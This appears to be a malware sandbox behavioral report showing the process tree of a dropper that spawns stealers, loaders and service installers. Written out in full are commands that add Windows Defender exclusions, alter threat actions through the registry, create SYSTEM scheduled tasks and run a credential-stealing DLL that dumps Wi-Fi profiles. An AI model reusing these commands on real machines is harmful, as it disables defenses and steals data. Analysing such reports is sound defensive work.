- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4124
- C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
  "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3496
- - C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe
    "C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:3032
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:2732
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:4708
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 876
      4⤵
      Program crash
      PID:836
- - C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe
    "C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe"
    3⤵
    - Executes dropped EXE
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1744
- - C:\Users\Admin\AppData\Local\Temp\1000073001\swiy.exe
    "C:\Users\Admin\AppData\Local\Temp\1000073001\swiy.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:2644
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:3140
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Loads dropped DLL
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:5048
- - C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe
    "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe"
    3⤵
    - UAC bypass
    - Windows security bypass
    - Checks computer location settings
    - Executes dropped EXE
    - Windows security modification
    - Checks whether UAC is enabled
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    - System policy modification
    PID:2384
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4584
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
      4⤵
      Drops startup file
      Suspicious use of AdjustPrivilegeToken
      PID:2100
    - - C:\Users\Admin\Pictures\utNGPg0gpQGWzXempS9Ntqy2.exe
        
        "C:\Users\Admin\Pictures\utNGPg0gpQGWzXempS9Ntqy2.exe"
        5⤵
        Executes dropped EXE
        
        PID:3036
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5804
      - C:\Users\Admin\Pictures\utNGPg0gpQGWzXempS9Ntqy2.exe
        
        "C:\Users\Admin\Pictures\utNGPg0gpQGWzXempS9Ntqy2.exe"
        6⤵
        
        PID:1516
    - - C:\Users\Admin\Pictures\RbzpEYFFyd2k3tlJwVJ7WCYu.exe
        
        "C:\Users\Admin\Pictures\RbzpEYFFyd2k3tlJwVJ7WCYu.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2192
      - C:\Users\Admin\AppData\Local\Temp\u1ow.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u1ow.0.exe"
        6⤵
        Executes dropped EXE
        
        PID:4632
      - C:\Users\Admin\AppData\Local\Temp\u1ow.1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u1ow.1.exe"
        6⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4804
        
        C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        7⤵
        
        PID:5216
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2192 -s 1452
        6⤵
        Program crash
        
        PID:4712
    - - C:\Users\Admin\Pictures\qFFwSZOquvgFriDnZOrAi6bC.exe
        
        "C:\Users\Admin\Pictures\qFFwSZOquvgFriDnZOrAi6bC.exe"
        5⤵
        Executes dropped EXE
        
        PID:4708
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5716
    - - C:\Users\Admin\Pictures\LPbieoz4f864OQzixQVkp6kB.exe
        
        "C:\Users\Admin\Pictures\LPbieoz4f864OQzixQVkp6kB.exe"
        5⤵
        Executes dropped EXE
        
        PID:4148
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5860
      - C:\Users\Admin\Pictures\LPbieoz4f864OQzixQVkp6kB.exe
        
        "C:\Users\Admin\Pictures\LPbieoz4f864OQzixQVkp6kB.exe"
        6⤵
        
        PID:4380
    - - C:\Users\Admin\Pictures\o39G6AMTz0QzrehN2CQMDgap.exe
        
        "C:\Users\Admin\Pictures\o39G6AMTz0QzrehN2CQMDgap.exe"
        5⤵
        Executes dropped EXE
        
        PID:4960
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5828
      - C:\Users\Admin\Pictures\o39G6AMTz0QzrehN2CQMDgap.exe
        
        "C:\Users\Admin\Pictures\o39G6AMTz0QzrehN2CQMDgap.exe"
        6⤵
        
        PID:4916
    - - C:\Users\Admin\Pictures\vOUAMco7oInyk0QGVUuWyWh9.exe
        
        "C:\Users\Admin\Pictures\vOUAMco7oInyk0QGVUuWyWh9.exe"
        5⤵
        Modifies firewall policy service
        Windows security bypass
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Windows security modification
        Checks whether UAC is enabled
        Drops file in System32 directory
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:912
    - - C:\Users\Admin\Pictures\YtrXGKuyCrSuooyxTQECTm8C.exe
        
        "C:\Users\Admin\Pictures\YtrXGKuyCrSuooyxTQECTm8C.exe"
        5⤵
        Executes dropped EXE
        
        PID:4528
      - C:\Users\Admin\AppData\Local\Temp\7zSE7DF.tmp\Install.exe
        
        .\Install.exe /ThYFdiduvbI "385118" /S
        6⤵
        
        PID:3816
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        7⤵
        
        PID:3552
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        8⤵
        
        PID:1776
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        9⤵
        
        PID:3732
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        10⤵
        
        PID:2220
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        8⤵
        
        PID:2220
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        9⤵
        
        PID:3088
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        10⤵
        
        PID:3436
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        8⤵
        
        PID:5164
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        9⤵
        
        PID:5196
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        10⤵
        
        PID:5488
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        8⤵
        
        PID:6056
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        9⤵
        
        PID:220
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        10⤵
        
        PID:6068
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        8⤵
        
        PID:1892
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        9⤵
        
        PID:5420
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5416
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        11⤵
        
        PID:5968
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        7⤵
        
        PID:4508
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:5264
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5300
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        
        PID:5404
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 14:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSE7DF.tmp\Install.exe\" it /cyldidHvBQ 385118 /S" /V1 /F
        7⤵
        Creates scheduled task(s)
        
        PID:4688
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        7⤵
        
        PID:5288
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        8⤵
        
        PID:5432
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        9⤵
        
        PID:5448
    - - C:\Users\Admin\Pictures\8ibHWmroRahSRkxf6gCyOH4y.exe
        
        "C:\Users\Admin\Pictures\8ibHWmroRahSRkxf6gCyOH4y.exe"
        5⤵
        
        PID:4052
      - C:\Users\Admin\AppData\Local\Temp\7zS119F.tmp\Install.exe
        
        .\Install.exe /ThYFdiduvbI "385118" /S
        6⤵
        
        PID:3296
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        7⤵
        
        PID:4144
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        8⤵
        
        PID:3052
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        9⤵
        
        PID:808
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        10⤵
        
        PID:2816
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        8⤵
        
        PID:4500
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        9⤵
        
        PID:2624
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        10⤵
        
        PID:1924
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        8⤵
        
        PID:5172
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        9⤵
        
        PID:5204
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        10⤵
        
        PID:5524
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        8⤵
        
        PID:5964
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        9⤵
        
        PID:3732
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        10⤵
        
        PID:5924
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        8⤵
        
        PID:5612
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        9⤵
        
        PID:3604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5472
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        11⤵
        
        PID:5624
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        7⤵
        
        PID:3632
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:5276
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5676
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        
        PID:5928
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 14:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS119F.tmp\Install.exe\" it /XPHdidBDpi 385118 /S" /V1 /F
        7⤵
        Creates scheduled task(s)
        
        PID:840
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        7⤵
        
        PID:5372
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        8⤵
        
        PID:5500
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        9⤵
        
        PID:5772
- - C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe
    "C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:4956
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:2224
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:4848
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
      4⤵
      Blocklisted process makes network request
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      PID:3684
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        
        PID:1924
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\124900551406_Desktop.zip' -CompressionLevel Optimal
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3848
- - C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe
    "C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:4256
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Checks computer location settings
      PID:1944
    - - C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4984
    - - C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
        5⤵
        Executes dropped EXE
        
        PID:836
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 332
      4⤵
      Program crash
      PID:4388
- - C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe
    "C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:2792
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
      4⤵
      PID:1492
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClient
        5⤵
        Launches sc.exe
        
        PID:4764
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClient confirm
        5⤵
        Executes dropped EXE
        
        PID:3160
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLink
        5⤵
        Launches sc.exe
        
        PID:4864
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLink confirm
        5⤵
        Executes dropped EXE
        
        PID:2788
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
        5⤵
        Executes dropped EXE
        
        PID:3672
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLink
        5⤵
        Executes dropped EXE
        
        PID:3632
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
      4⤵
      PID:4728
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClientC
        5⤵
        Launches sc.exe
        
        PID:3100
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClientC confirm
        5⤵
        
        PID:2600
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc delete PiercingNetLink
        5⤵
        Launches sc.exe
        
        PID:1732
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove PiercingNetLink confirm
        5⤵
        
        PID:2892
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
        5⤵
        
        PID:5148
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start PiercingNetLink
        5⤵
        
        PID:5464
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
      4⤵
      PID:5892
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLinks
        5⤵
        Launches sc.exe
        
        PID:5260
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLinks confirm
        5⤵
        
        PID:3000
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
        5⤵
        
        PID:1640
- - C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
    "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:4396
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe" /F
      4⤵
      Creates scheduled task(s)
      PID:4576
  - - C:\Users\Admin\AppData\Local\Temp\1000244001\ISetup8.exe
      "C:\Users\Admin\AppData\Local\Temp\1000244001\ISetup8.exe"
      4⤵
      Executes dropped EXE
      PID:3560
    - - C:\Users\Admin\AppData\Local\Temp\u2qw.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u2qw.0.exe"
        5⤵
        
        PID:2592
    - - C:\Users\Admin\AppData\Local\Temp\u2qw.1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u2qw.1.exe"
        5⤵
        
        PID:2688
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3560 -s 1528
        5⤵
        Program crash
        
        PID:3744
  - - C:\Users\Admin\AppData\Local\Temp\1000245001\toolspub1.exe
      "C:\Users\Admin\AppData\Local\Temp\1000245001\toolspub1.exe"
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      PID:5000
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5000 -s 356
        5⤵
        Program crash
        
        PID:4404
  - - C:\Users\Admin\AppData\Local\Temp\1000246001\4767d2e713f2021e8fe856e3ea638b58.exe
      "C:\Users\Admin\AppData\Local\Temp\1000246001\4767d2e713f2021e8fe856e3ea638b58.exe"
      4⤵
      PID:2300
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5288
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
    3⤵
